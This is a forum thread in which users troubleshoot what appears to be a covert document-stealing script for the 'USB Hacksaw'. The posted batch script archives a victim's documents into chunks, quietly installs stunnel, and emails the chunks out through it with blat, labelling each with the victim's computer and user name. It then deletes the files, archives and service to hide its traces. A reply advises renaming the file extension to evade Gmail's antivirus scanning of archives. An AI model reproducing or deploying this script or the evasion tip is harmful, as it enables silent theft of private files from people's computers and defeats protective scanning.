Jump to content

still dont recieve .rar


DLSS

Recommended Posts

ok this is a problem i cnat seem to get fixed with the hacksaw ....

i recieve the r00 files fine but dont recieve the rar file .....

and without the rar file u cant open the r00 (well u can but its incomplete ...)

Link to comment
Share on other sites

just the standard one with a lil subject add on ...

:: Configure Email Options

SET emailfrom=blablah@blahblah.blah

SET emailto=blablah@blahblah.blah

SET password=blahblahblah

SET subj="%COMPUTERNAME% %USERNAME% %DATE%"



:: Archive documents in 1MB chunks

rar a goodies.rar .docs -v1024k -vn

stunnel-4.11.exe -install -quiet

net start stunnel

GOTO sendfiles



:cleanup

:: Stop stunnel

rem taskkill /f /im stunnel-4.11.exe (??)

net stop stunnel

stunnel-4.11.exe -uninstall -quiet

:: Delete documents

rmdir /s /q docs

:: Delete archive

del /q /f goodies*.*

GOTO end



:sendfiles

for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -s %subj% -server 127.0.0.1:1099

GOTO cleanup



:end

Link to comment
Share on other sites

I didnt test it, but it looks fine.

My only other theory now would be that gmail knows a .rar file is an archive and their antivirus checks archives. If for some reason there is a virus or something gmail does not like in the .rar file then it will not allow it to be sent.

The only way around that is to rename the file extension to something gmail does not know.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...